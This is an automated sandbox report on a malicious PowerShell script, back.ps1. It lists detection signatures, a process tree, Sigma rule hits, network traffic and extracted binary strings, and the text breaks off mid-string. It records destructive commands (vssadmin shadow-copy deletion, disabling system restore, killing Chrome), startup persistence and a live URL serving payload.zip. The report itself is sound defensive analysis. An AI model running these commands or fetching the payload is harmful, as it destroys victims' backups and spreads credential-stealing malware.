Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
back.ps1

Overview

General Information

Sample name:back.ps1
Analysis ID:1566089
MD5:a5b77ea033190c4d914caec05d0d3442
SHA1:a706128c4d0ebb2e1392ebc5bf72e6977802e86b
SHA256:a8ef13f70701de206e5d946838605d299bb096caa6c149e70af25e938bed576a
Tags:ps1usjjsjsj-com-nguser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the document folder of the user
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
May disable shadow drive data (uses vssadmin)
Modifies existing user documents (likely ransomware behavior)
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zed.exe (PID: 2260 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" MD5: FAECB8128727E4D7B36E49B3161A2C9E)
      • zed.exe (PID: 3196 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" MD5: FAECB8128727E4D7B36E49B3161A2C9E)
        • powershell.exe (PID: 2064 cmdline: powershell -Command "Disable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7120 cmdline: powershell -Command "Enable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • vssadmin.exe (PID: 5432 cmdline: vssadmin delete shadows /for=C: /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
          • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ChromeComboPack.exe (PID: 1780 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe" MD5: 8FD73177DC4A6FCC03F8E0307960A488)
      • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ChromeComboPack.exe (PID: 6860 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe" MD5: 8FD73177DC4A6FCC03F8E0307960A488)
        • taskkill.exe (PID: 6116 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • zed.exe (PID: 1336 cmdline: C:\Users\user\Documents\gogjothegoat\payload\zed.exe MD5: FAECB8128727E4D7B36E49B3161A2C9E)
    • zed.exe (PID: 7128 cmdline: C:\Users\user\Documents\gogjothegoat\payload\zed.exe MD5: FAECB8128727E4D7B36E49B3161A2C9E)
      • powershell.exe (PID: 7156 cmdline: powershell -Command "Disable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5932 cmdline: powershell -Command "Enable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 5984 cmdline: vssadmin delete shadows /for=C: /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: vssadmin delete shadows /for=C: /all /quiet, CommandLine: vssadmin delete shadows /for=C: /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" , ParentImage: C:\Users\user\Documents\gogjothegoat\payload\zed.exe, ParentProcessId: 3196, ParentProcessName: zed.exe, ProcessCommandLine: vssadmin delete shadows /for=C: /all /quiet, ProcessId: 5432, ProcessName: vssadmin.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", ProcessId: 3136, ProcessName: powershell.exe
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", ProcessId: 3136, ProcessName: powershell.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://usjjsjsj.com.ng/execute/payload.zipAvira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.3% probability
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\wheel-0.43.0.dist-info\LICENSE.txt
Source: unknownHTTPS traffic detected: 142.132.252.48:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: zed.exe, 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: cryptography_rust.pdbc source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3025129202.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AEA9000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: zed.exe, 0000000C.00000002.4772130024.00007FFDA46B8000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: zed.exe, 0000000C.00000002.4773886122.00007FFDA5B83000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: zed.exe, 0000000C.00000002.4767256618.00007FFDA4171000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764105632.00007FFDA3617000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: zed.exe, 0000000C.00000002.4764475130.00007FFDA3652000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026160093.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4771312925.00007FFDA4633000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4766514931.00007FFDA3ECE000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4765265995.00007FFDA3A89000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: cryptography_rust.pdb source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: zed.exe, 0000000C.00000002.4733289830.00000132F7DD0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: zed.exe, 0000000C.00000002.4763446184.00007FFDA35ED000.00000002.00000001.01000000.00000019.sdmp
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5309280 FindFirstFileExW,FindClose,6_2_00007FF7E5309280
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5321874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF7E5321874
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF7E53083C0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B7810 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,32_2_00007FF78C9B7810
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B87E0 FindFirstFileExW,FindClose,32_2_00007FF78C9B87E0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D2A84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_00007FF78C9D2A84
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: global trafficHTTP traffic detected: GET /execute/payload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: usjjsjsj.com.ngConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /execute/payload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: usjjsjsj.com.ngConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: usjjsjsj.com.ng
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyusering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: zed.exe, 00000007.00000002.4730450635.0000019AE168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
